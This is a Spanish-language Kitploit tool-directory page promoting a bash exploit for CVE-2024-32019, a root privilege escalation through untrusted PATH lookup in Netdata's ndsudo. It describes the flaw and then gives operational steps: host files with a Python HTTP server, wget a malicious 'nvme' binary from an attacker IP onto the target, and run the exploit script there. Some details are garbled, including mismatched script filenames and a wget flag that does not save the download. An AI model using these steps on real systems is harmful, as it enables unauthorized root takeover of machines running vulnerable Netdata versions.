Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-32019-ndsudo — Exploit de escalada de privilegios basado en Bash para CVE-2024-32019 en la herramienta ndsudo del Agente Netdata, aprovechando la búsqueda de PATH no confiable para ejecutar binarios arbitrarios con permisos de root. | Kitploit
Herramientas/GitHubGitHub/justjoeyking/cve-2024-32019-ndsudo
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHubjustjoeyking/cve-2024-32019-ndsudo

CVE-2024-32019-ndsudo

Exploit de escalada de privilegios basado en Bash para CVE-2024-32019 en la herramienta ndsudo del Agente Netdata, aprovechando la búsqueda de PATH no confiable para ejecutar binarios arbitrarios con permisos de root.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
12hace 9 mesesAún no revisado

La vulnerabilidad ndsudo permite a un atacante obtener permisos de root explotando una ruta de búsqueda no confiable en la herramienta ndsudo, que forma parte del Netdata Agent. Esto puede permitir la ejecución de programas arbitrarios con privilegios elevados si el atacante coloca un binario malicioso en un directorio escribible y modifica la variable de entorno PATH en consecuencia.

La vulnerabilidad ndsudo, identificada como CVE-2024-32019, afecta a las versiones de la herramienta ndsudo incluidas con Netdata Agent, específicamente las versiones v1.45.0 y anteriores. Esta vulnerabilidad permite a los atacantes escalar privilegios en los sistemas donde la herramienta está instalada.

Cómo funciona la vulnerabilidad:

Mecanismo de explotación:-

Ruta de búsqueda no confiable: La herramienta ndsudo utiliza la variable de entorno PATH para localizar comandos externos. Un atacante puede manipular esta variable para que apunte a un directorio que controle.

Ejecución de binarios maliciosos: Al colocar un ejecutable malicioso con el mismo nombre que un comando que ndsudo pueda
ejecutar (por ejemplo, nvme) en un directorio escribible, el atacante puede ejecutar código arbitrario con permisos de root.

Complejidad del ataque:-

Baja complejidad: El ataque no requiere habilidades avanzadas; un script bash fácilmente creado puede usarse para escalar privilegios, lo que lo hace accesible para muchos atacantes potenciales.

Impacto de la vulnerabilidad:-

Escalada de privilegios: Una explotación exitosa permite a un atacante obtener acceso root, lo que puede llevar a un control total sobre el sistema afectado.

Riesgos potenciales: Esto puede resultar en acceso no autorizado a datos, manipulación del sistema y una mayor explotación de recursos de la red.

PRIVILEGE ESCALATION He creado dos scripts bash para obtener fácilmente acceso de usuario a root. Siga los pasos como se mencionan a continuación:

root@kitploit:~
  git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git

  cd CVE-2024-32019-ndsudo

  chmod +x ndsudo_exp.sh

Ahora cree un servidor python:

root@kitploit:~
  python3 -m http.server 8080

Abra el archivo ndsudo_exploit.sh usando gedit o pluma, el que esté disponible. Podrá ver el comando wget de esta forma:

root@kitploit:~
  wget http://10.10.14.70:8080/nvme -o /tmp/nvme

Cambie la dirección IP por la IP de su propia máquina.

Ahora vaya a la máquina objetivo, abra una terminal y haga lo siguiente:

root@kitploit:~
  wget http://<su-ip>:8080/ndsudo_exploit.sh

  chmod +x ndsudo_exploit.sh

  ./ndsudo_exploit.sh
Descargar herramienta